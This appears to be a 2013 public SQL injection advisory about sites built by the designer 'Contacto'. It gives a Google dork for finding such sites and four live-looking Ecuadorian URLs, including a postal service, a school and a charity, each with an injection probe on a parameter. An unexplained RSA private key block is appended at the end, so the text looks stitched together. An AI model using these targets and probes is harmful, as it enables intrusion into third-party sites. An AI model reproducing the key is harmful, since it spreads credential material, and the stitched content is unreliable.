Sites designed by Contacto suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
d22b8f3a7653af24c6d99cf9d97c5ddc31438918dc4c21280764a67ac1bd889b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Twitte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: ur0b0r0x.blogspot.com
# Exploit Title: Diseño CONTACTO - Sql Injection Vulnerability
# dork: intext:"Web diseñado por:CONTACTO"
# Date: 05/01/2013
# Author: Ur0b0r0x
# Url Vendor: http://www.contacto.com/
# Vendor Name: Contacto
# Tested On: Backtrack R3 / Linux Mint
# Type: php
------------------- Agreement --------------------
[29/12/2012] - Vulnerability discovered
[04/01/2013] - Vendor notified Dont responsed
[05/01/2013] - Public disclosure
--------------------------------------------------
#Sample/Sql
http://www.correosdelecuador.com.ec/pages/interna.php?txtCodiInfo=76'
http://www.isaacnewton.edu.ec/espanol/pages/interna_noticias_select.php?txtCodiNoti=141'
http://www.monteolivo.com.ec/interna_noticia.php?txtBusc_Mes=S
http://www.compassion.org.ec/pages/interna_noticias_select.php?txtCodiNoti=83'
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/
-----END RSA PRIVATE KEY-----